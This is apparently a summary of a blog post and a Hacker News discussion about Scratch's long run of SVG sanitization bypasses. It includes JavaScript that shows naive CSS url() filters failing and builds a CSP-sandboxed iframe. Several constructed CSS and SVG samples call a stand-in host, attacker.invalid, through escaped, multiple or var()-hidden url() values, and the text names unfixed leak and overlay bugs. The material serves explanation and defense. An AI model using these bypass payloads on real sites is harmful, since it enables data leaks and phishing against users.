Scratch’s seven-year chain of SVG sanitization failures shows that parsing attacker-controlled SVGs into the live DOM is inherently unsafe regardless of sanitizer complexity.
Key Takeaways
Root cause: Scratch appends user-supplied SVGs into the main document for bounding-box measurement, making any sanitization approach a permanent game of whack-a-mole.
Vulnerability chain spans 2019-2026: regex bypass via <SCRIPT>, DOMPurify gaps for HTTP leaks, CSS @import, Paper.js receiving unsanitized input, CSS url() escape codes, and CSS image-set().
Each fix added complexity that introduced new bypasses; the 2026 url() patch missed escape codes, multi-url attributes, and CSS variable indirection all at once.
The page-restyling bug (using 9999s CSS transitions to persist styles after SVG removal) remains unfixed and enables phishing UI overlays on scratch.mit.edu.
The author disclosed image-set() and a further leak via CSS Units/Images Level 4 to Scratch in 2025; the disclosure window has lapsed and neither has been fixed.
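The three ways the url() patch is described as failing (escape codes, a second url() in the same value, indirection through a custom property) can be reproduced against a text-level filter in a few lines. The block below is an added example, not Scratch's code or the post's: naiveSanitizeCss is a constructed stand-in for a "strip url(http...) from known properties" patch, the three inputs are constructed samples, and the names are this example's own. The token-level extractor decodes CSS escapes inside the url token and scans every declaration instead of keying on property names, which is what closes all three at once; it deliberately does not cover @import with a bare string or image-set(), which is the page's point about this being a blocklist game.

```javascript
// Added example (not Scratch's code). naiveSanitizeCss stands in for a patch that
// looks at known properties, at the leading url() of each value, and at the literal
// scheme text. extractUrlTargets does what a correct check has to do instead.

const NAIVE_CHECKED_PROPS = new Set(["fill", "stroke", "background", "background-image", "mask", "filter"]);

// Constructed stand-in for the naive patch: only known properties are inspected,
// only the value's leading url() is examined, only literal "http"/"https" matches.
function naiveSanitizeCss(css) {
  return css.replace(/([-\w]+)\s*:\s*([^;}]+)/g, (decl, prop, value) => {
    if (!NAIVE_CHECKED_PROPS.has(prop.toLowerCase())) return decl;
    return `${prop}: ${value.replace(/^url\(\s*["']?https?:[^)]*\)/i, "none")}`;
  });
}

// CSS Syntax Level 3 "consume an escaped code point": after a backslash, 1-6 hex
// digits plus one optional whitespace; otherwise the next character literally.
function consumeEscape(text, i) {
  const hex = /^[0-9a-fA-F]{1,6}/.exec(text.slice(i, i + 6));
  if (hex) {
    let next = i + hex[0].length;
    if (/[ \t\n\f\r]/.test(text[next] || "")) next += 1;
    const cp = parseInt(hex[0], 16);
    const invalid = cp === 0 || (cp >= 0xd800 && cp <= 0xdfff) || cp > 0x10ffff;
    return { ch: invalid ? "\ufffd" : String.fromCodePoint(cp), next };
  }
  return { ch: text[i] === undefined ? "\ufffd" : text[i], next: i + 1 };
}

// Every url() target in the sheet, escapes decoded inside the token. The whole
// sheet is scanned, custom properties included, so a value hidden behind var()
// is seen where it is defined; nothing is keyed on property names.
function extractUrlTargets(css) {
  const targets = [];
  const re = /url\(/gi; // function names are ASCII case-insensitive
  let m;
  while ((m = re.exec(css)) !== null) {
    let i = m.index + 4;
    while (i < css.length && /[ \t\n\f\r]/.test(css[i])) i++;
    let quote = null;
    if (css[i] === '"' || css[i] === "'") quote = css[i++];
    let out = "";
    while (i < css.length) {
      const c = css[i];
      if (c === "\\") {
        const e = consumeEscape(css, i + 1);
        out += e.ch;
        i = e.next;
        continue;
      }
      if (quote ? c === quote : c === ")" || /[ \t\n\f\r]/.test(c)) break;
      out += c;
      i++;
    }
    targets.push(out);
    re.lastIndex = i; // resume after the token just consumed
  }
  return targets;
}

// Allowlist, not blocklist: only same-document fragments and data: URLs survive.
function urlTargetIsSafe(target) {
  return target.startsWith("#") || /^data:/i.test(target);
}

function hasUnsafeUrl(css) {
  return extractUrlTargets(css).some((t) => !urlTargetIsSafe(t));
}

// Constructed samples for the three bypass classes (attacker.invalid is a reserved name).
const SAMPLES = {
  plain: "rect { fill: url(http://attacker.invalid/leak) }",
  escape: "rect { fill: url(\\68ttp://attacker.invalid/leak) }",
  multi: "rect { background: url(#ok), url(http://attacker.invalid/leak) }",
  variable: ':root { --x: url("http://attacker.invalid/leak") } rect { background: var(--x) }',
};

// For each sample: did the naive filter change anything, and does the token-level check flag it?
function bypassReport() {
  const report = {};
  for (const [name, css] of Object.entries(SAMPLES)) {
    report[name] = { naiveChanged: naiveSanitizeCss(css) !== css, tokenLevelFlags: hasUnsafeUrl(css) };
  }
  return report;
}

console.log(bypassReport());
```

Only the plain sample is changed by the naive filter; the other three pass through it untouched and are all flagged by the token-level check. Note that what extractUrlTargets does is still only a check for one resource-fetching form: @import with a bare string, image-set() and whatever CSS adds next are separate channels, which is why the page argues for a sandbox rather than a better filter.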
Hacker News Comment Review
Consensus: the only architecturally sound fix is CSP or true sandboxing; commenters pointed to <iframe sandbox srcdoc> with a strict CSP meta tag as the practical path, since sanitization cannot reliably block all CSS-level exfiltration channels.
Several commenters proposed restricting SVG to a safe structural subset (paths, fills, basic shapes) that covers the vast majority of real-world costume assets, trading feature completeness for a dramatically smaller attack surface.
Background context from the thread: Google Slides still lacks SVG import after 15 years for exactly this reason, and Cloudflare shipped svg-hush to handle the same class of problems, signaling how hard the general case is.
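The sandboxing route the thread converged on, written out as an added example (not Scratch's code, and not anything a commenter posted): the untrusted SVG is rendered in an iframe with a bare sandbox attribute, inside a srcdoc document whose own Content-Security-Policy meta tag denies every fetch. The policy string, the helper names and the sample SVG are this example's own choices; the point it makes beyond the thread is that srcdoc is an attribute, so the whole inner document has to be attribute-escaped or a quote in the SVG breaks out of it.

```javascript
// Added example (not Scratch's code). The control is the frame's origin and its
// CSP, not a sanitizer: the SVG is inlined as-is and nothing it contains can
// reach the network or run script.

const SVG_SANDBOX_CSP = [
  "default-src 'none'",        // nothing may be fetched unless a directive below allows it
  "style-src 'unsafe-inline'", // <style> and style="" inside the SVG keep working; @import still needs a host source, so it is blocked
  "img-src data:",             // embedded raster data only; no http(s) image loads from CSS or <image>
].join("; ");

// Escape text for element content and double-quoted attribute values.
function escapeHtml(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/"/g, "&quot;");
}

// The inner document. If the SVG breaks out of <body> or adds a <meta> CSP of
// its own, it is still in this opaque origin and CSPs only ever intersect.
function buildSandboxDocument(svgMarkup) {
  return "<!doctype html><html><head>" +
    `<meta http-equiv="Content-Security-Policy" content="${escapeHtml(SVG_SANDBOX_CSP)}">` +
    `</head><body style="margin:0">${svgMarkup}</body></html>`;
}

// Host-page side. A sandbox attribute with no allow-* tokens means opaque origin,
// no script, no forms, no top-level navigation. srcdoc is an attribute, so the
// inner document is attribute-escaped once more; the inner parser undoes that layer.
function buildSandboxedIframe(svgMarkup) {
  return `<iframe sandbox srcdoc="${escapeHtml(buildSandboxDocument(svgMarkup))}"` +
    ` style="pointer-events:none"></iframe>`;
}

// Constructed sample: a costume that tries the url() leak from the page.
const SAMPLE_SVG =
  '<svg xmlns="http://www.w3.org/2000/svg"><rect width="1" height="1" fill="url(http://attacker.invalid/x)"/></svg>';

console.log(buildSandboxedIframe(SAMPLE_SVG));
```

Two caveats a practitioner should keep in mind. First, the host cannot read a sandboxed frame's DOM, so the bounding-box measurement Scratch does today would have to run inside the frame (which means allow-scripts plus a script-src entry for the measuring script, still in an opaque origin) and come back over postMessage. Second, CSP governs fetches, not navigations: a sandboxed frame may still navigate itself, for example via a link click or a smuggled meta refresh, which is why the frame above takes no pointer events and why the SVG should still be parsed as image/svg+xml and reduced to its SVG root before it is inlined.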
Notable Comments
@evilpie: The browser’s native HTML Sanitizer API allows a safe SVG subset by default but strips <style> entirely – useful baseline but CSS is still a gap.
@nmilo: “they found XSS in SVGs in a surface with attacker-controlled access to Node and their fix was sanitizing it using regex” – sharp criticism of Scratch’s security process and delayed timelines.